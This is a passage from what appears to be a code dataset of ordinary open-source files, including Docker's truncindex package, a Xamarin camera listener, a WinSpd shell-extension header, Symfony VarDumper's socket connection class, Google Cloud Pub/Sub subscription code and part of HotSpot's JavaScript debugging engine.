NO otherwise.\n */\n- (BOOL)cancel:(nullable id)token;\n\n@end\n"} {"text": "// Package truncindex provides a general 'index tree', used by Docker\n// in order to be able to reference containers by only a few unambiguous\n// characters of their id.\npackage truncindex\n\nimport (\n\t\"errors\"\n\t\"fmt\"\n\t\"strings\"\n\t\"sync\"\n\n\t\"github.com/tchap/go-patricia/patricia\"\n)\n\nvar (\n\t// ErrEmptyPrefix is an error returned if the prefix was empty.\n\tErrEmptyPrefix = errors.New(\"Prefix can't be empty\")\n\n\t// ErrIllegalChar is returned when a space is in the ID\n\tErrIllegalChar = errors.New(\"illegal character: ' '\")\n\n\t// ErrNotExist is returned when ID or its prefix not found in index.\n\tErrNotExist = errors.New(\"ID does not exist\")\n)\n\n// ErrAmbiguousPrefix is returned if the prefix was ambiguous\n// (multiple ids for the prefix).\ntype ErrAmbiguousPrefix struct {\n\tprefix string\n}\n\nfunc (e ErrAmbiguousPrefix) Error() string {\n\treturn fmt.Sprintf(\"Multiple IDs found with provided prefix: %s\", e.prefix)\n}\n\n// TruncIndex allows the retrieval of string identifiers by any of their unique prefixes.\n// This is used to retrieve image and container IDs by more convenient shorthand prefixes.\ntype TruncIndex struct {\n\tsync.RWMutex\n\ttrie *patricia.Trie\n\tids map[string]struct{}\n}\n\n// NewTruncIndex creates a new TruncIndex and initializes with a list of IDs.\nfunc NewTruncIndex(ids []string) (idx *TruncIndex) {\n\tidx = &TruncIndex{\n\t\tids: make(map[string]struct{}),\n\n\t\t// Change patricia max prefix per node length,\n\t\t// because our len(ID) always 64\n\t\ttrie: patricia.NewTrie(patricia.MaxPrefixPerNode(64)),\n\t}\n\tfor _, id := range ids {\n\t\tidx.addID(id)\n\t}\n\treturn\n}\n\nfunc (idx *TruncIndex) addID(id string) error {\n\tif strings.Contains(id, \" \") {\n\t\treturn ErrIllegalChar\n\t}\n\tif id == \"\" {\n\t\treturn ErrEmptyPrefix\n\t}\n\tif _, exists := idx.ids[id]; exists {\n\t\treturn fmt.Errorf(\"id already exists: '%s'\", id)\n\t}\n\tidx.ids[id] = struct{}{}\n\tif inserted := idx.trie.Insert(patricia.Prefix(id), struct{}{}); !inserted {\n\t\treturn fmt.Errorf(\"failed to insert id: %s\", id)\n\t}\n\treturn nil\n}\n\n// Add adds a new ID to the TruncIndex.\nfunc (idx *TruncIndex) Add(id string) error {\n\tidx.Lock()\n\tdefer idx.Unlock()\n\treturn idx.addID(id)\n}\n\n// Delete removes an ID from the TruncIndex. If there are multiple IDs\n// with the given prefix, an error is thrown.\nfunc (idx *TruncIndex) Delete(id string) error {\n\tidx.Lock()\n\tdefer idx.Unlock()\n\tif _, exists := idx.ids[id]; !exists || id == \"\" {\n\t\treturn fmt.Errorf(\"no such id: '%s'\", id)\n\t}\n\tdelete(idx.ids, id)\n\tif deleted := idx.trie.Delete(patricia.Prefix(id)); !deleted {\n\t\treturn fmt.Errorf(\"no such id: '%s'\", id)\n\t}\n\treturn nil\n}\n\n// Get retrieves an ID from the TruncIndex. 
If there are multiple IDs\n// with the given prefix, an error is thrown.\nfunc (idx *TruncIndex) Get(s string) (string, error) {\n\tif s == \"\" {\n\t\treturn \"\", ErrEmptyPrefix\n\t}\n\tvar (\n\t\tid string\n\t)\n\tsubTreeVisitFunc := func(prefix patricia.Prefix, item patricia.Item) error {\n\t\tif id != \"\" {\n\t\t\t// we haven't found the ID if there are two or more IDs\n\t\t\tid = \"\"\n\t\t\treturn ErrAmbiguousPrefix{prefix: string(prefix)}\n\t\t}\n\t\tid = string(prefix)\n\t\treturn nil\n\t}\n\n\tidx.RLock()\n\tdefer idx.RUnlock()\n\tif err := idx.trie.VisitSubtree(patricia.Prefix(s), subTreeVisitFunc); err != nil {\n\t\treturn \"\", err\n\t}\n\tif id != \"\" {\n\t\treturn id, nil\n\t}\n\treturn \"\", ErrNotExist\n}\n\n// Iterate iterates over all stored IDs and passes each of them to the given\n// handler. Take care that the handler method does not call any public\n// method on truncindex as the internal locking is not reentrant/recursive\n// and will result in deadlock.\nfunc (idx *TruncIndex) Iterate(handler func(id string)) {\n\tidx.Lock()\n\tdefer idx.Unlock()\n\tidx.trie.Visit(func(prefix patricia.Prefix, item patricia.Item) error {\n\t\thandler(string(prefix))\n\t\treturn nil\n\t})\n}\n"} {"text": "using Android.Views;\n\nnamespace Camera2Basic.Listeners\n{\n public class Camera2BasicSurfaceTextureListener : Java.Lang.Object, TextureView.ISurfaceTextureListener\n {\n private readonly Camera2BasicFragment owner;\n\n public Camera2BasicSurfaceTextureListener(Camera2BasicFragment owner)\n {\n if (owner == null)\n throw new System.ArgumentNullException(\"owner\");\n this.owner = owner;\n }\n\n public void OnSurfaceTextureAvailable(Android.Graphics.SurfaceTexture surface, int width, int height)\n {\n owner.OpenCamera(width, height);\n }\n\n public bool OnSurfaceTextureDestroyed(Android.Graphics.SurfaceTexture surface)\n {\n return true;\n }\n\n public void OnSurfaceTextureSizeChanged(Android.Graphics.SurfaceTexture surface, int width, int height)\n {\n owner.ConfigureTransform(width, height);\n }\n\n public void OnSurfaceTextureUpdated(Android.Graphics.SurfaceTexture surface)\n {\n\n }\n }\n}"} {"text": "/**\n * @file shellex/command.hpp\n *\n * @copyright 2018-2020 Bill Zissimopoulos\n */\n/*\n * This file is part of WinSpd.\n *\n * You can redistribute it and/or modify it under the terms of the GNU\n * General Public License version 3 as published by the Free Software\n * Foundation.\n *\n * Licensees holding a valid commercial license may use this software\n * in accordance with the commercial license agreement provided in\n * conjunction with the software. 
The terms and conditions of any such\n * commercial license agreement shall govern, supersede, and render\n * ineffective any application of the GPLv3 license to this software,\n * notwithstanding of any reference thereto in the software or\n * associated repository.\n */\n\n#ifndef WINSPD_SHELLEX_COMMAND_HPP_INCLUDED\n#define WINSPD_SHELLEX_COMMAND_HPP_INCLUDED\n\n#include \n#include \n\nclass Command : public CoObject<\n IInitializeCommand,\n IObjectWithSelection,\n IExecuteCommand,\n IExplorerCommandState>\n{\npublic:\n /* IInitializeCommand */\n STDMETHODIMP Initialize(LPCWSTR CommandName, IPropertyBag *Bag)\n {\n return S_OK;\n }\n\n /* IObjectWithSelection */\n STDMETHODIMP SetSelection(IShellItemArray *Array)\n {\n if (0 != _Array)\n _Array->Release();\n if (0 != Array)\n Array->AddRef();\n _Array = Array;\n return S_OK;\n }\n STDMETHODIMP GetSelection(REFIID Iid, void **PObject)\n {\n if (0 != _Array)\n return _Array->QueryInterface(Iid, PObject);\n else\n {\n *PObject = 0;\n return E_NOINTERFACE;\n }\n }\n\n /* IExecuteCommand */\n STDMETHODIMP SetKeyState(DWORD KeyState)\n {\n return S_OK;\n }\n STDMETHODIMP SetParameters(LPCWSTR Parameters)\n {\n return S_OK;\n }\n STDMETHODIMP SetPosition(POINT Point)\n {\n return S_OK;\n }\n STDMETHODIMP SetShowWindow(int Show)\n {\n return S_OK;\n }\n STDMETHODIMP SetNoShowUI(BOOL NoShowUI)\n {\n return S_OK;\n }\n STDMETHODIMP SetDirectory(LPCWSTR Directory)\n {\n return S_OK;\n }\n STDMETHODIMP Execute()\n {\n return S_OK;\n }\n\n /* IExplorerCommandState */\n STDMETHODIMP GetState(IShellItemArray *Array, BOOL OkToBeSlow, EXPCMDSTATE *CmdState)\n {\n *CmdState = ECS_ENABLED;\n return S_OK;\n }\n\n /* internal interface */\n Command() : _Array(0)\n {\n }\n ~Command()\n {\n if (0 != _Array)\n _Array->Release();\n }\n\nprotected:\n IShellItemArray *_Array;\n};\n\n#endif\n"} {"text": "\n *\n * For the full copyright and license information, please view the LICENSE\n * file that was distributed with this source code.\n */\n\nnamespace Symfony\\Component\\VarDumper\\Server;\n\nuse Symfony\\Component\\VarDumper\\Cloner\\Data;\nuse Symfony\\Component\\VarDumper\\Dumper\\ContextProvider\\ContextProviderInterface;\n\n/**\n * Forwards serialized Data clones to a server.\n *\n * @author Maxime Steinhausser \n */\nclass Connection\n{\n private $host;\n private $contextProviders;\n private $socket;\n\n /**\n * @param string $host The server host\n * @param ContextProviderInterface[] $contextProviders Context providers indexed by context name\n */\n public function __construct(string $host, array $contextProviders = [])\n {\n if (false === strpos($host, '://')) {\n $host = 'tcp://'.$host;\n }\n\n $this->host = $host;\n $this->contextProviders = $contextProviders;\n }\n\n public function getContextProviders(): array\n {\n return $this->contextProviders;\n }\n\n public function write(Data $data): bool\n {\n $socketIsFresh = !$this->socket;\n if (!$this->socket = $this->socket ?: $this->createSocket()) {\n return false;\n }\n\n $context = ['timestamp' => microtime(true)];\n foreach ($this->contextProviders as $name => $provider) {\n $context[$name] = $provider->getContext();\n }\n $context = array_filter($context);\n $encodedPayload = base64_encode(serialize([$data, $context])).\"\\n\";\n\n set_error_handler([self::class, 'nullErrorHandler']);\n try {\n if (-1 !== stream_socket_sendto($this->socket, $encodedPayload)) {\n return true;\n }\n if (!$socketIsFresh) {\n stream_socket_shutdown($this->socket, STREAM_SHUT_RDWR);\n fclose($this->socket);\n 
$this->socket = $this->createSocket();\n }\n if (-1 !== stream_socket_sendto($this->socket, $encodedPayload)) {\n return true;\n }\n } finally {\n restore_error_handler();\n }\n\n return false;\n }\n\n private static function nullErrorHandler($t, $m)\n {\n // no-op\n }\n\n private function createSocket()\n {\n set_error_handler([self::class, 'nullErrorHandler']);\n try {\n return stream_socket_client($this->host, $errno, $errstr, 3, STREAM_CLIENT_CONNECT | STREAM_CLIENT_ASYNC_CONNECT);\n } finally {\n restore_error_handler();\n }\n }\n}\n"} {"text": "// Copyright 2016 Google Inc. All Rights Reserved.\n//\n// Licensed under the Apache License, Version 2.0 (the \"License\");\n// you may not use this file except in compliance with the License.\n// You may obtain a copy of the License at\n//\n// http://www.apache.org/licenses/LICENSE-2.0\n//\n// Unless required by applicable law or agreed to in writing, software\n// distributed under the License is distributed on an \"AS IS\" BASIS,\n// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n// See the License for the specific language governing permissions and\n// limitations under the License.\n\npackage pubsub\n\nimport (\n\t\"errors\"\n\t\"fmt\"\n\t\"io\"\n\t\"strings\"\n\t\"sync\"\n\t\"time\"\n\n\t\"cloud.google.com/go/iam\"\n\t\"golang.org/x/net/context\"\n\t\"golang.org/x/sync/errgroup\"\n\t\"google.golang.org/grpc\"\n\t\"google.golang.org/grpc/codes\"\n)\n\n// Subscription is a reference to a PubSub subscription.\ntype Subscription struct {\n\ts service\n\n\t// The fully qualified identifier for the subscription, in the format \"projects//subscriptions/\"\n\tname string\n\n\t// Settings for pulling messages. Configure these before calling Receive.\n\tReceiveSettings ReceiveSettings\n\n\tmu sync.Mutex\n\treceiveActive bool\n}\n\n// Subscription creates a reference to a subscription.\nfunc (c *Client) Subscription(id string) *Subscription {\n\treturn newSubscription(c.s, fmt.Sprintf(\"projects/%s/subscriptions/%s\", c.projectID, id))\n}\n\nfunc newSubscription(s service, name string) *Subscription {\n\treturn &Subscription{\n\t\ts: s,\n\t\tname: name,\n\t}\n}\n\n// String returns the globally unique printable name of the subscription.\nfunc (s *Subscription) String() string {\n\treturn s.name\n}\n\n// ID returns the unique identifier of the subscription within its project.\nfunc (s *Subscription) ID() string {\n\tslash := strings.LastIndex(s.name, \"/\")\n\tif slash == -1 {\n\t\t// name is not a fully-qualified name.\n\t\tpanic(\"bad subscription name\")\n\t}\n\treturn s.name[slash+1:]\n}\n\n// Subscriptions returns an iterator which returns all of the subscriptions for the client's project.\nfunc (c *Client) Subscriptions(ctx context.Context) *SubscriptionIterator {\n\treturn &SubscriptionIterator{\n\t\ts: c.s,\n\t\tnext: c.s.listProjectSubscriptions(ctx, c.fullyQualifiedProjectName()),\n\t}\n}\n\n// SubscriptionIterator is an iterator that returns a series of subscriptions.\ntype SubscriptionIterator struct {\n\ts service\n\tnext nextStringFunc\n}\n\n// Next returns the next subscription. 
If there are no more subscriptions, iterator.Done will be returned.\nfunc (subs *SubscriptionIterator) Next() (*Subscription, error) {\n\tsubName, err := subs.next()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn newSubscription(subs.s, subName), nil\n}\n\n// PushConfig contains configuration for subscriptions that operate in push mode.\ntype PushConfig struct {\n\t// A URL locating the endpoint to which messages should be pushed.\n\tEndpoint string\n\n\t// Endpoint configuration attributes. See https://cloud.google.com/pubsub/docs/reference/rest/v1/projects.subscriptions#pushconfig for more details.\n\tAttributes map[string]string\n}\n\n// Subscription config contains the configuration of a subscription.\ntype SubscriptionConfig struct {\n\tTopic *Topic\n\tPushConfig PushConfig\n\n\t// The default maximum time after a subscriber receives a message before\n\t// the subscriber should acknowledge the message. Note: messages which are\n\t// obtained via Subscription.Receive need not be acknowledged within this\n\t// deadline, as the deadline will be automatically extended.\n\tAckDeadline time.Duration\n\n\t// Whether to retain acknowledged messages. If true, acknowledged messages\n\t// will not be expunged until they fall out of the RetentionDuration window.\n\tretainAckedMessages bool\n\n\t// How long to retain messages in backlog, from the time of publish. If RetainAckedMessages is true,\n\t// this duration affects the retention of acknowledged messages,\n\t// otherwise only unacknowledged messages are retained.\n\t// Defaults to 7 days. Cannot be longer than 7 days or shorter than 10 minutes.\n\tretentionDuration time.Duration\n}\n\n// ReceiveSettings configure the Receive method.\n// A zero ReceiveSettings will result in values equivalent to DefaultReceiveSettings.\ntype ReceiveSettings struct {\n\t// MaxExtension is the maximum period for which the Subscription should\n\t// automatically extend the ack deadline for each message.\n\t//\n\t// The Subscription will automatically extend the ack deadline of all\n\t// fetched Messages for the duration specified. Automatic deadline\n\t// extension may be disabled by specifying a duration less than 1.\n\tMaxExtension time.Duration\n\n\t// MaxOutstandingMessages is the maximum number of unprocessed messages\n\t// (unacknowledged but not yet expired). If MaxOutstandingMessages is 0, it\n\t// will be treated as if it were DefaultReceiveSettings.MaxOutstandingMessages.\n\t// If the value is negative, then there will be no limit on the number of\n\t// unprocessed messages.\n\tMaxOutstandingMessages int\n\n\t// MaxOutstandingBytes is the maximum size of unprocessed messages\n\t// (unacknowledged but not yet expired). If MaxOutstandingBytes is 0, it will\n\t// be treated as if it were DefaultReceiveSettings.MaxOutstandingBytes. If\n\t// the value is negative, then there will be no limit on the number of bytes\n\t// for unprocessed messages.\n\tMaxOutstandingBytes int\n\n\t// NumGoroutines is the number of goroutines Receive will spawn to pull\n\t// messages concurrently. If NumGoroutines is less than 1, it will be treated\n\t// as if it were DefaultReceiveSettings.NumGoroutines.\n\t//\n\t// NumGoroutines does not limit the number of messages that can be processed\n\t// concurrently. Even with one goroutine, many messages might be processed at\n\t// once, because that goroutine may continually receive messages and invoke the\n\t// function passed to Receive on them. 
To limit the number of messages being\n\t// processed concurrently, set MaxOutstandingMessages.\n\tNumGoroutines int\n}\n\n// DefaultReceiveSettings holds the default values for ReceiveSettings.\nvar DefaultReceiveSettings = ReceiveSettings{\n\tMaxExtension: 10 * time.Minute,\n\tMaxOutstandingMessages: 1000,\n\tMaxOutstandingBytes: 1e9, // 1G\n\tNumGoroutines: 1,\n}\n\n// Delete deletes the subscription.\nfunc (s *Subscription) Delete(ctx context.Context) error {\n\treturn s.s.deleteSubscription(ctx, s.name)\n}\n\n// Exists reports whether the subscription exists on the server.\nfunc (s *Subscription) Exists(ctx context.Context) (bool, error) {\n\treturn s.s.subscriptionExists(ctx, s.name)\n}\n\n// Config fetches the current configuration for the subscription.\nfunc (s *Subscription) Config(ctx context.Context) (SubscriptionConfig, error) {\n\tconf, topicName, err := s.s.getSubscriptionConfig(ctx, s.name)\n\tif err != nil {\n\t\treturn SubscriptionConfig{}, err\n\t}\n\tconf.Topic = &Topic{\n\t\ts: s.s,\n\t\tname: topicName,\n\t}\n\treturn conf, nil\n}\n\n// SubscriptionConfigToUpdate describes how to update a subscription.\ntype SubscriptionConfigToUpdate struct {\n\t// If non-nil, the push config is changed.\n\tPushConfig *PushConfig\n}\n\n// Update changes an existing subscription according to the fields set in cfg.\n// It returns the new SubscriptionConfig.\n//\n// Update returns an error if no fields were modified.\nfunc (s *Subscription) Update(ctx context.Context, cfg SubscriptionConfigToUpdate) (SubscriptionConfig, error) {\n\tif cfg.PushConfig == nil {\n\t\treturn SubscriptionConfig{}, errors.New(\"pubsub: UpdateSubscription call with nothing to update\")\n\t}\n\tif err := s.s.modifyPushConfig(ctx, s.name, *cfg.PushConfig); err != nil {\n\t\treturn SubscriptionConfig{}, err\n\t}\n\treturn s.Config(ctx)\n}\n\nfunc (s *Subscription) IAM() *iam.Handle {\n\treturn s.s.iamHandle(s.name)\n}\n\n// CreateSubscription creates a new subscription on a topic.\n//\n// id is the name of the subscription to create. It must start with a letter,\n// and contain only letters ([A-Za-z]), numbers ([0-9]), dashes (-),\n// underscores (_), periods (.), tildes (~), plus (+) or percent signs (%). It\n// must be between 3 and 255 characters in length, and must not start with\n// \"goog\".\n//\n// cfg.Topic is the topic from which the subscription should receive messages. It\n// need not belong to the same project as the subscription. This field is required.\n//\n// cfg.AckDeadline is the maximum time after a subscriber receives a message before\n// the subscriber should acknowledge the message. It must be between 10 and 600\n// seconds (inclusive), and is rounded down to the nearest second. 
If the\n// provided ackDeadline is 0, then the default value of 10 seconds is used.\n// Note: messages which are obtained via Subscription.Receive need not be\n// acknowledged within this deadline, as the deadline will be automatically\n// extended.\n//\n// cfg.PushConfig may be set to configure this subscription for push delivery.\n//\n// If the subscription already exists an error will be returned.\nfunc (c *Client) CreateSubscription(ctx context.Context, id string, cfg SubscriptionConfig) (*Subscription, error) {\n\tif cfg.Topic == nil {\n\t\treturn nil, errors.New(\"pubsub: require non-nil Topic\")\n\t}\n\tif cfg.AckDeadline == 0 {\n\t\tcfg.AckDeadline = 10 * time.Second\n\t}\n\tif d := cfg.AckDeadline; d < 10*time.Second || d > 600*time.Second {\n\t\treturn nil, fmt.Errorf(\"ack deadline must be between 10 and 600 seconds; got: %v\", d)\n\t}\n\n\tsub := c.Subscription(id)\n\terr := c.s.createSubscription(ctx, sub.name, cfg)\n\treturn sub, err\n}\n\nvar errReceiveInProgress = errors.New(\"pubsub: Receive already in progress for this subscription\")\n\n// Receive calls f with the outstanding messages from the subscription.\n// It blocks until ctx is done, or the service returns a non-retryable error.\n//\n// The standard way to terminate a Receive is to cancel its context:\n//\n// cctx, cancel := context.WithCancel(ctx)\n// err := sub.Receive(cctx, callback)\n// // Call cancel from callback, or another goroutine.\n//\n// If the service returns a non-retryable error, Receive returns that error after\n// all of the outstanding calls to f have returned. If ctx is done, Receive\n// returns nil after all of the outstanding calls to f have returned and\n// all messages have been acknowledged or have expired.\n//\n// Receive calls f concurrently from multiple goroutines. 
It is encouraged to\n// process messages synchronously in f, even if that processing is relatively\n// time-consuming; Receive will spawn new goroutines for incoming messages,\n// limited by MaxOutstandingMessages and MaxOutstandingBytes in ReceiveSettings.\n//\n// The context passed to f will be canceled when ctx is Done or there is a\n// fatal service error.\n//\n// Receive will automatically extend the ack deadline of all fetched Messages for the\n// period specified by s.ReceiveSettings.MaxExtension.\n//\n// Each Subscription may have only one invocation of Receive active at a time.\nfunc (s *Subscription) Receive(ctx context.Context, f func(context.Context, *Message)) error {\n\ts.mu.Lock()\n\tif s.receiveActive {\n\t\ts.mu.Unlock()\n\t\treturn errReceiveInProgress\n\t}\n\ts.receiveActive = true\n\ts.mu.Unlock()\n\tdefer func() { s.mu.Lock(); s.receiveActive = false; s.mu.Unlock() }()\n\n\tconfig, err := s.Config(ctx)\n\tif err != nil {\n\t\tif grpc.Code(err) == codes.Canceled {\n\t\t\treturn nil\n\t\t}\n\t\treturn err\n\t}\n\tmaxCount := s.ReceiveSettings.MaxOutstandingMessages\n\tif maxCount == 0 {\n\t\tmaxCount = DefaultReceiveSettings.MaxOutstandingMessages\n\t}\n\tmaxBytes := s.ReceiveSettings.MaxOutstandingBytes\n\tif maxBytes == 0 {\n\t\tmaxBytes = DefaultReceiveSettings.MaxOutstandingBytes\n\t}\n\tmaxExt := s.ReceiveSettings.MaxExtension\n\tif maxExt == 0 {\n\t\tmaxExt = DefaultReceiveSettings.MaxExtension\n\t} else if maxExt < 0 {\n\t\t// If MaxExtension is negative, disable automatic extension.\n\t\tmaxExt = 0\n\t}\n\tnumGoroutines := s.ReceiveSettings.NumGoroutines\n\tif numGoroutines < 1 {\n\t\tnumGoroutines = DefaultReceiveSettings.NumGoroutines\n\t}\n\t// TODO(jba): add tests that verify that ReceiveSettings are correctly processed.\n\tpo := &pullOptions{\n\t\tmaxExtension: maxExt,\n\t\tmaxPrefetch: trunc32(int64(maxCount)),\n\t\tackDeadline: config.AckDeadline,\n\t}\n\tfc := newFlowController(maxCount, maxBytes)\n\n\t// Wait for all goroutines started by Receive to return, so instead of an\n\t// obscure goroutine leak we have an obvious blocked call to Receive.\n\tgroup, gctx := errgroup.WithContext(ctx)\n\tfor i := 0; i < numGoroutines; i++ {\n\t\tgroup.Go(func() error {\n\t\t\treturn s.receive(gctx, po, fc, f)\n\t\t})\n\t}\n\treturn group.Wait()\n}\n\nfunc (s *Subscription) receive(ctx context.Context, po *pullOptions, fc *flowController, f func(context.Context, *Message)) error {\n\t// Cancel a sub-context when we return, to kick the context-aware callbacks\n\t// and the goroutine below.\n\tctx2, cancel := context.WithCancel(ctx)\n\t// Call stop when Receive's context is done.\n\t// Stop will block until all outstanding messages have been acknowledged\n\t// or there was a fatal service error.\n\t// The iterator does not use the context passed to Receive. If it did, canceling\n\t// that context would immediately stop the iterator without waiting for unacked\n\t// messages.\n\titer := newMessageIterator(context.Background(), s.s, s.name, po)\n\n\t// We cannot use errgroup from Receive here. Receive might already be calling group.Wait,\n\t// and group.Wait cannot be called concurrently with group.Go. 
We give each receive() its\n\t// own WaitGroup instead.\n\t// Since wg.Add is only called from the main goroutine, wg.Wait is guaranteed\n\t// to be called after all Adds.\n\tvar wg sync.WaitGroup\n\twg.Add(1)\n\tgo func() {\n\t\t<-ctx2.Done()\n\t\titer.stop()\n\t\twg.Done()\n\t}()\n\tdefer wg.Wait()\n\n\tdefer cancel()\n\tfor {\n\t\tmsgs, err := iter.receive()\n\t\tif err == io.EOF {\n\t\t\treturn nil\n\t\t}\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tfor i, msg := range msgs {\n\t\t\tmsg := msg\n\t\t\t// TODO(jba): call acquire closer to when the message is allocated.\n\t\t\tif err := fc.acquire(ctx, len(msg.Data)); err != nil {\n\t\t\t\t// TODO(jba): test that these \"orphaned\" messages are nacked immediately when ctx is done.\n\t\t\t\tfor _, m := range msgs[i:] {\n\t\t\t\t\tm.Nack()\n\t\t\t\t}\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\twg.Add(1)\n\t\t\tgo func() {\n\t\t\t\t// TODO(jba): call release when the message is available for GC.\n\t\t\t\t// This considers the message to be released when\n\t\t\t\t// f is finished, but f may ack early or not at all.\n\t\t\t\tdefer wg.Done()\n\t\t\t\tdefer fc.release(len(msg.Data))\n\t\t\t\tf(ctx2, msg)\n\t\t\t}()\n\t\t}\n\t}\n}\n\n// TODO(jba): remove when we delete messageIterator.\ntype pullOptions struct {\n\tmaxExtension time.Duration\n\tmaxPrefetch int32\n\t// ackDeadline is the default ack deadline for the subscription. Not\n\t// configurable.\n\tackDeadline time.Duration\n}\n"} {"text": "/*\n * Copyright (c) 2004, 2012, Oracle and/or its affiliates. All rights reserved.\n * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.\n *\n * This code is free software; you can redistribute it and/or modify it\n * under the terms of the GNU General Public License version 2 only, as\n * published by the Free Software Foundation.\n *\n * This code is distributed in the hope that it will be useful, but WITHOUT\n * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or\n * FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU General Public License\n * version 2 for more details (a copy is included in the LICENSE file that\n * accompanied this code).\n *\n * You should have received a copy of the GNU General Public License version\n * 2 along with this work; if not, write to the Free Software Foundation,\n * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n *\n * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA\n * or visit www.oracle.com if you need additional information or have any\n * questions.\n *\n */\n\npackage sun.jvm.hotspot.utilities.soql;\n\nimport java.io.*;\nimport java.util.*;\nimport javax.script.Invocable;\nimport javax.script.ScriptContext;\nimport javax.script.ScriptEngine;\nimport javax.script.ScriptEngineManager;\nimport javax.script.ScriptException;\nimport sun.jvm.hotspot.debugger.*;\nimport sun.jvm.hotspot.oops.*;\nimport sun.jvm.hotspot.runtime.*;\nimport sun.jvm.hotspot.utilities.*;\nimport sun.jvm.hotspot.tools.*;\nimport sun.jvm.hotspot.tools.jcore.*;\nimport java.lang.reflect.Method;\nimport java.lang.reflect.Modifier;\n\n/**\n * Simple wrapper around jsr-223 JavaScript script engine.\n * In addition to wrapping useful functionality of jsr-223 engine,\n * this class exposed certain \"global\" functions to the script.\n */\npublic abstract class JSJavaScriptEngine extends MapScriptObject {\n /**\n * Start a read-eval-print loop with this engine.\n */\n public void startConsole() {\n start(true);\n }\n\n /**\n * Initialize the engine so that we can \"eval\" strings\n * and files later.\n */\n public void start() {\n start(false);\n }\n\n /**\n * Define a global function that invokes given Method.\n */\n public void defineFunction(Object target, Method method) {\n putFunction(target, method, false);\n }\n\n /**\n * Call the script function of given name passing the\n * given arguments.\n */\n public Object call(String name, Object[] args) {\n Invocable invocable = (Invocable)engine;\n try {\n return invocable.invokeFunction(name, args);\n } catch (RuntimeException re) {\n throw re;\n } catch (Exception exp) {\n throw new RuntimeException(exp);\n }\n }\n\n /**\n address function returns address of JSJavaObject as String. For other\n type of objects, the result is undefined.\n */\n public Object address(Object[] args) {\n if (args.length != 1) return UNDEFINED;\n Object o = args[0];\n if (o != null && o instanceof JSJavaObject) {\n return ((JSJavaObject)o).getOop().getHandle().toString();\n } else {\n return UNDEFINED;\n }\n }\n\n\n /**\n classof function gets type of given JSJavaInstance or JSJavaArray. Or\n given a string class name, this function gets the class object. For\n other type of objects, the result is undefined.\n */\n public Object classof(Object[] args) {\n if (args.length != 1) {\n return UNDEFINED;\n }\n Object o = args[0];\n if (o != null) {\n if (o instanceof JSJavaObject) {\n if (o instanceof JSJavaInstance) {\n return ((JSJavaInstance)o).getJSJavaClass();\n } else if (o instanceof JSJavaArray) {\n return ((JSJavaArray)o).getJSJavaClass();\n } else {\n return UNDEFINED;\n }\n } else if (o instanceof String) {\n InstanceKlass ik = SystemDictionaryHelper.findInstanceKlass((String) o);\n return getJSJavaFactory().newJSJavaKlass(ik).getJSJavaClass();\n } else {\n return UNDEFINED;\n }\n } else {\n return UNDEFINED;\n }\n }\n\n /**\n * dumpClass function creates a .class file for a given Class object.\n * On success, returns true. Else, returns false. 
Second optional argument\n * specifies the directory in which .class content is dumped. This defaults\n * to '.'\n */\n public Object dumpClass(Object[] args) {\n if (args.length == 0) {\n return Boolean.FALSE;\n }\n Object clazz = args[0];\n if (clazz == null) {\n return Boolean.FALSE;\n }\n InstanceKlass ik = null;\n if (clazz instanceof String) {\n String name = (String) clazz;\n if (name.startsWith(\"0x\")) {\n // treat it as address\n VM vm = VM.getVM();\n Address addr = vm.getDebugger().parseAddress(name);\n Metadata metadata = Metadata.instantiateWrapperFor(addr.addOffsetTo(0));\n if (metadata instanceof InstanceKlass) {\n ik = (InstanceKlass) metadata;\n } else {\n return Boolean.FALSE;\n }\n } else {\n ik = SystemDictionaryHelper.findInstanceKlass((String) clazz);\n }\n } else if (clazz instanceof JSJavaClass) {\n JSJavaKlass jk = ((JSJavaClass)clazz).getJSJavaKlass();\n if (jk != null && jk instanceof JSJavaInstanceKlass) {\n ik = ((JSJavaInstanceKlass)jk).getInstanceKlass();\n }\n } else {\n return Boolean.FALSE;\n }\n\n if (ik == null) return Boolean.FALSE;\n StringBuffer buf = new StringBuffer();\n if (args.length > 1) {\n buf.append(args[1].toString());\n } else {\n buf.append('.');\n }\n\n buf.append(File.separatorChar);\n buf.append(ik.getName().asString().replace('/', File.separatorChar));\n buf.append(\".class\");\n String fileName = buf.toString();\n File file = new File(fileName);\n\n try {\n int index = fileName.lastIndexOf(File.separatorChar);\n File dir = new File(fileName.substring(0, index));\n dir.mkdirs();\n FileOutputStream fos = new FileOutputStream(file);\n ClassWriter cw = new ClassWriter(ik, fos);\n cw.write();\n fos.close();\n } catch (IOException exp) {\n printError(exp.toString(), exp);\n return Boolean.FALSE;\n }\n\n return Boolean.TRUE;\n }\n\n /**\n * dumpHeap function creates a heap dump file.\n * On success, returns true. Else, returns false.\n */\n public Object dumpHeap(Object[] args) {\n String fileName = \"heap.bin\";\n if (args.length > 0) {\n fileName = args[0].toString();\n }\n return new JMap().writeHeapHprofBin(fileName)? Boolean.TRUE: Boolean.FALSE;\n }\n\n /**\n help function prints help message for global functions and variables.\n */\n public void help(Object[] args) {\n println(\"Function/Variable Description\");\n println(\"================= ===========\");\n println(\"address(jobject) returns the address of the Java object\");\n println(\"classof(jobject) returns the class object of the Java object\");\n println(\"dumpClass(jclass,[dir]) writes .class for the given Java Class\");\n println(\"dumpHeap([file]) writes heap in hprof binary format\");\n println(\"help() prints this help message\");\n println(\"identityHash(jobject) returns the hashCode of the Java object\");\n println(\"mirror(jobject) returns a local mirror of the Java object\");\n println(\"load([file1, file2,...]) loads JavaScript file(s). With no files, reads \");\n println(\"object(string) converts a string address into Java object\");\n println(\"owner(jobject) returns the owner thread of this monitor or null\");\n println(\"sizeof(jobject) returns the size of Java object in bytes\");\n println(\"staticof(jclass, field) returns a static field of the given Java class\");\n println(\"read([prompt]) reads a single line from standard input\");\n println(\"quit() quits the interactive load call\");\n println(\"jvm the target jvm that is being debugged\");\n }\n\n /**\n identityHash function gets identity hash code value of given\n JSJavaObject. 
